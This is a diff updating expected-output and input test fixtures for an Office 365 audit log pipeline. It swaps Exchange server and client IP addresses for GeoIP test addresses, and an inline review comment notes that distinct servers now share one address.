ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", 
@@ -278,12 +278,12 @@
 },
 {
 "server": {
- "address": "15.20.225.32",
+ "address": "67.43.156.13",
 "domain": "DB3PR0102MB3500",
- "ip": "15.20.225.32"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.225.32"
+ "ip": "67.43.156.13"
 },
 "source": {
 "ip": "::1"
@@ -332,7 +332,7 @@
 "related": {
 "ip": [
 "::1",
- "15.20.225.32"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -348,8 +348,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695637Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"815684be-4e52-4cb2-9242-08d7b386e333\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (15.20.225.32)\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659946600Z", + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"815684be-4e52-4cb2-9242-08d7b386e333\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, 
FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -370,12 +370,12 @@ }, { "server": { - "address": "15.20.207.31", + "address": "67.43.156.13", "domain": "DB7PR01MB4428", - "ip": "15.20.207.31" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.31" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -424,7 +424,7 @@ "related": { "ip": [ "::1", - "15.20.207.31" + "67.43.156.13" ] }, "organization": { 
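Review bot: In the `@@ -370,12 +370,12 @@` hunk the server `"domain": "DB7PR01MB4428"` now expects `"ip": "67.43.156.13"`, the same address the earlier `@@ -278` hunk expects for `"domain": "DB3PR0102MB3500"`, so every OriginatingServer in this fixture collapses onto one value and the expected output can no longer tell whether `server.ip`, `destination.ip` and `related.ip` came from this event's own `OriginatingServer` or were carried over from a neighbouring event. Consider giving the distinct mailbox servers distinct addresses from the supported GeoIP test subset so a cross-event mix-up in the extraction still fails the test. It is also worth noting that swapping in a GeoIP-resolvable address added no `geo`/`as` lines under `server` or `destination` in this hunk (old and new line counts are equal), which suggests the pipeline only enriches `source.ip`; if that is intentional, a one-line note in the data stream's README or pipeline description would save the next reader from looking for the missing enrichment.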
@@ -440,8 +440,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695638800Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"f5b56c26-18aa-4984-822e-08d7b386d7e2\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (15.20.207.31)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659952200Z", + "original": 
"{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"f5b56c26-18aa-4984-822e-08d7b386d7e2\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -462,12 +462,12 @@ }, { "server": { - "address": "15.20.207.31", + "address": "67.43.156.13", "domain": "DB7PR01MB4428", - "ip": "15.20.207.31" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.31" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -516,7 +516,7 @@ "related": { "ip": [ "::1", - "15.20.207.31" + "67.43.156.13" ] }, "organization": { 
@@ -532,8 +532,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695640400Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"25ccad93-82ad-4742-5231-08d7b386d7e6\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (15.20.207.31)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659957700Z", + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"25ccad93-82ad-4742-5231-08d7b386d7e6\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, 
FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -554,12 +554,12 @@ }, { "server": { - "address": "15.20.225.32", + "address": "67.43.156.13", "domain": "DB3PR0102MB3500", - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -608,7 +608,7 @@ "related": { "ip": [ "::1", - "15.20.225.32" + "67.43.156.13" ] }, "organization": { 
@@ -624,8 +624,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695642Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"edb9bb1f-9629-43a1-0a57-08d7b386e31c\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659963600Z", + "original": 
"{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"edb9bb1f-9629-43a1-0a57-08d7b386e31c\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -646,12 +646,12 @@ }, { "server": { - "address": "15.20.225.32", + "address": "67.43.156.13", "domain": "AM6PR01MB4535", - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -700,7 +700,7 @@ "related": { "ip": [ "::1", - "15.20.225.32" + "67.43.156.13" ] }, "organization": { 
@@ -716,8 +716,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695643600Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"df63d186-b4d9-49a8-748c-08d7b3cc81fb\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659969200Z", + "original": 
"{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"df63d186-b4d9-49a8-748c-08d7b3cc81fb\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", @@ -738,12 +738,12 @@ }, { "server": { - "address": "15.20.225.32", + "address": "67.43.156.13", "domain": "AM6PR01MB4535", - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.225.32" + "ip": "67.43.156.13" }, "source": { "ip": "::1" @@ -792,7 +792,7 @@ "related": { "ip": [ "::1", - "15.20.225.32" + "67.43.156.13" ] }, "organization": { 
@@ -808,8 +808,8 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-17T07:32:53.695645500Z", - "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"284dfe85-ab53-48ad-0863-08d7b3cc81f7\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (15.20.225.32)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:42.659974700Z", + "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"284dfe85-ab53-48ad-0863-08d7b3cc81f7\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, 
Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json index ce157ae57e6..ef899784e41 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json @@ -57,10 +57,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"[2001:db8::abcd]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}" + "original": "{\"ClientIP\":\"[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}" }, "o365audit": { - "ClientIP": "[2001:db8::abcd]:12345", + "ClientIP": "[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]:12345", "CreationTime": "2020-02-17T17:12:03", "Id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", "RecordType": -1 
@@ -68,10 +68,10 @@
 },
 {
 "event": {
- "original": "{\"ClientIP\":\"2001:db8::abcd\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}"
+ "original": "{\"ClientIP\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}"
 },
 "o365audit": {
- "ClientIP": "2001:db8::abcd",
+ "ClientIP": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
 "CreationTime": "2020-02-17T17:12:03",
 "Id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226",
 "RecordType": -1
@@ -79,10 +79,10 @@
 },
 {
 "event": {
- "original": "{\"ClientIP\":\"[2001:db8::abcd]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}"
+ "original": "{\"ClientIP\":\"[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}"
 },
 "o365audit": {
- "ClientIP": "[2001:db8::abcd]",
+ "ClientIP": "[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]",
 "CreationTime": "2020-02-17T17:12:03",
 "Id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226",
 "RecordType": -1
